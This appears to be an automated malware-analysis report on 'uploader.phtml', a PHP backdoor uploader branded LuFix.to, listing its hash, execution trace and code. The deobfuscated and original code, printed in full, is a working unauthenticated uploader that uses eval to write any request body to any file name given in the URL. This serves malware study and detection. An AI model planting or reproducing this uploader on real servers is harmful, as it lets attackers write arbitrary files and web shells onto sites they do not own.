PHP Malware Analysis
uploader.phtml
md5: 69a677fa956b523a859e529e807476ec
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- eval (Deobfuscated, Original)
Input
- _GET (Deobfuscated, Original, Traces)
- php:\/\/input (Deobfuscated, Original, Traces)
Deobfuscated PHP code
<h4>LuFix.to Uploader</h4>
<input type="file" id="upload_files" name="upload_files" multiple="multiple">
<button id="b" value="upload" onclick='upload("upload_files",0);'>Upload</button>
<br><p>Status : <span id="status" style="color:red;">No file added</span></p>
<script>
function upload(fileInputId, fileIndex)
{
var url = window.location.pathname;
var scriptname = url.substring(url.lastIndexOf('/')+1);
var filename = document.getElementById('upload_files').value;
var filename = filename.match(/[^\\/]*$/)[0];
document.getElementById("status").textContent = "Uploading the file "+filename+", please wait..";
document.getElementById("status").style.color = "blue";
// take the file from the input
var file = document.getElementById(fileInputId).files[fileIndex];
var reader = new FileReader();
reader.readAsBinaryString(file); // alternatively you can use readAsDataURL
reader.onloadend = function(evt)
{
// create XHR instance
xhr = new XMLHttpRequest();
// send the file through POST
xhr.open("POST", scriptname+"?name="+filename, true);
// make sure we have the sendAsBinary method on all browsers
XMLHttpRequest.prototype.mySendAsBinary = function(text){
var data = new ArrayBuffer(text.length);
var ui8a = new Uint8Array(data, 0);
for (var i = 0; i < text.length; i++) ui8a[i] = (text.charCodeAt(i) & 0xff);
if(typeof window.Blob == "function")
{
var blob = new Blob([data]);
}else{
var bb = new (window.MozBlobBuilder || window.WebKitBlobBuilder || window.BlobBuilder)();
bb.append(data);
var blob = bb.getBlob();
}
this.send(blob);
}
// let's track upload progress
var eventSource = xhr.upload || xhr;
eventSource.addEventListener("progress", function(e) {
// get percentage of how much of the current file has been sent
var position = e.position || e.loaded;
var total = e.totalSize || e.total;
var percentage = Math.round((position/total)*100);
// here you should write your own code how you wish to proces this
});
// state change observer - we need to know when and if the file was successfully uploaded
xhr.onreadystatechange = function()
{
if(xhr.readyState == 4)
{
if(xhr.status == 200)
{
// process success
document.getElementById("status").textContent = "The file "+filename+" Uploaded successfully in same folder.";
document.getElementById("status").style.color = "green";
}else{
// process error
}
}
};
// start sending
xhr.mySendAsBinary(evt.target.result);
};
}
</script>
<?php
$text = 'if(!empty($_GET["name"])){
$inputHandler = fopen("php://input", "r");
$fileHandler = fopen($_GET["name"], "w+");
while(true) {
$buffer = fgets($inputHandler, 4096);
if (strlen($buffer) == 0) {
fclose($inputHandler);
fclose($fileHandler);
return true;
}
fwrite($fileHandler, $buffer);
}
}';
eval($text);Execution traces
data/traces/69a677fa956b523a859e529e807476ec_trace-1676252833.1268.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:47:39.024611]
1 0 1 0.000171 393528
1 3 0 0.000225 397816 {main} 1 /var/www/html/uploads/uploader.phtml 0 0
1 A /var/www/html/uploads/uploader.phtml 77 $text = 'if(!empty($_GET["name"])){\r\n\t$inputHandler = fopen("php://input", "r");\r\n\t$fileHandler = fopen($_GET["name"], "w+");\r\n\twhile(true) {\r\n\t\t$buffer = fgets($inputHandler, 4096);\r\n\t\tif (strlen($buffer) == 0) {\r\n\t\t\tfclose($inputHandler);\r\n\t\t\tfclose($fileHandler);\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\tfwrite($fileHandler, $buffer);\r\n\t}\r\n}'
2 4 0 0.000301 402208 eval 1 'if(!empty($_GET["name"])){\r\n\t$inputHandler = fopen("php://input", "r");\r\n\t$fileHandler = fopen($_GET["name"], "w+");\r\n\twhile(true) {\r\n\t\t$buffer = fgets($inputHandler, 4096);\r\n\t\tif (strlen($buffer) == 0) {\r\n\t\t\tfclose($inputHandler);\r\n\t\t\tfclose($fileHandler);\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\tfwrite($fileHandler, $buffer);\r\n\t}\r\n}' /var/www/html/uploads/uploader.phtml 90 0
2 4 1 0.000328 402208
1 3 1 0.000336 399000
0.000362 315040
TRACE END [2023-02-12 23:47:39.024836]
Generated HTML code
<html><head></head><body><h4>LuFix.to Uploader</h4>
<input type="file" id="upload_files" name="upload_files" multiple="multiple">
<button id="b" value="upload" onclick="upload("upload_files",0);">Upload</button>
<br><p>Status : <span id="status" style="color:red;">No file added</span></p>
<script>
function upload(fileInputId, fileIndex)
{
var url = window.location.pathname;
var scriptname = url.substring(url.lastIndexOf('/')+1);
var filename = document.getElementById('upload_files').value;
var filename = filename.match(/[^\\/]*$/)[0];
document.getElementById("status").textContent = "Uploading the file "+filename+", please wait..";
document.getElementById("status").style.color = "blue";
// take the file from the input
var file = document.getElementById(fileInputId).files[fileIndex];
var reader = new FileReader();
reader.readAsBinaryString(file); // alternatively you can use readAsDataURL
reader.onloadend = function(evt)
{
// create XHR instance
xhr = new XMLHttpRequest();
// send the file through POST
xhr.open("POST", scriptname+"?name="+filename, true);
// make sure we have the sendAsBinary method on all browsers
XMLHttpRequest.prototype.mySendAsBinary = function(text){
var data = new ArrayBuffer(text.length);
var ui8a = new Uint8Array(data, 0);
for (var i = 0; i < text.length; i++) ui8a[i] = (text.charCodeAt(i) & 0xff);
if(typeof window.Blob == "function")
{
var blob = new Blob([data]);
}else{
var bb = new (window.MozBlobBuilder || window.WebKitBlobBuilder || window.BlobBuilder)();
bb.append(data);
var blob = bb.getBlob();
}
this.send(blob);
}
// let's track upload progress
var eventSource = xhr.upload || xhr;
eventSource.addEventListener("progress", function(e) {
// get percentage of how much of the current file has been sent
var position = e.position || e.loaded;
var total = e.totalSize || e.total;
var percentage = Math.round((position/total)*100);
// here you should write your own code how you wish to proces this
});
// state change observer - we need to know when and if the file was successfully uploaded
xhr.onreadystatechange = function()
{
if(xhr.readyState == 4)
{
if(xhr.status == 200)
{
// process success
document.getElementById("status").textContent = "The file "+filename+" Uploaded successfully in same folder.";
document.getElementById("status").style.color = "green";
}else{
// process error
}
}
};
// start sending
xhr.mySendAsBinary(evt.target.result);
};
}
</script>
</body></html>Original PHP code
<h4>LuFix.to Uploader</h4>
<input type="file" id="upload_files" name="upload_files" multiple="multiple">
<button id="b" value="upload" onclick='upload("upload_files",0);'>Upload</button>
<br><p>Status : <span id="status" style="color:red;">No file added</span></p>
<script>
function upload(fileInputId, fileIndex)
{
var url = window.location.pathname;
var scriptname = url.substring(url.lastIndexOf('/')+1);
var filename = document.getElementById('upload_files').value;
var filename = filename.match(/[^\\/]*$/)[0];
document.getElementById("status").textContent = "Uploading the file "+filename+", please wait..";
document.getElementById("status").style.color = "blue";
// take the file from the input
var file = document.getElementById(fileInputId).files[fileIndex];
var reader = new FileReader();
reader.readAsBinaryString(file); // alternatively you can use readAsDataURL
reader.onloadend = function(evt)
{
// create XHR instance
xhr = new XMLHttpRequest();
// send the file through POST
xhr.open("POST", scriptname+"?name="+filename, true);
// make sure we have the sendAsBinary method on all browsers
XMLHttpRequest.prototype.mySendAsBinary = function(text){
var data = new ArrayBuffer(text.length);
var ui8a = new Uint8Array(data, 0);
for (var i = 0; i < text.length; i++) ui8a[i] = (text.charCodeAt(i) & 0xff);
if(typeof window.Blob == "function")
{
var blob = new Blob([data]);
}else{
var bb = new (window.MozBlobBuilder || window.WebKitBlobBuilder || window.BlobBuilder)();
bb.append(data);
var blob = bb.getBlob();
}
this.send(blob);
}
// let's track upload progress
var eventSource = xhr.upload || xhr;
eventSource.addEventListener("progress", function(e) {
// get percentage of how much of the current file has been sent
var position = e.position || e.loaded;
var total = e.totalSize || e.total;
var percentage = Math.round((position/total)*100);
// here you should write your own code how you wish to proces this
});
// state change observer - we need to know when and if the file was successfully uploaded
xhr.onreadystatechange = function()
{
if(xhr.readyState == 4)
{
if(xhr.status == 200)
{
// process success
document.getElementById("status").textContent = "The file "+filename+" Uploaded successfully in same folder.";
document.getElementById("status").style.color = "green";
}else{
// process error
}
}
};
// start sending
xhr.mySendAsBinary(evt.target.result);
};
}
</script>
<?php
$text = 'if(!empty($_GET["name"])){
$inputHandler = fopen("php://input", "r");
$fileHandler = fopen($_GET["name"], "w+");
while(true) {
$buffer = fgets($inputHandler, 4096);
if (strlen($buffer) == 0) {
fclose($inputHandler);
fclose($fileHandler);
return true;
}
fwrite($fileHandler, $buffer);
}
}';
eval($text);
?>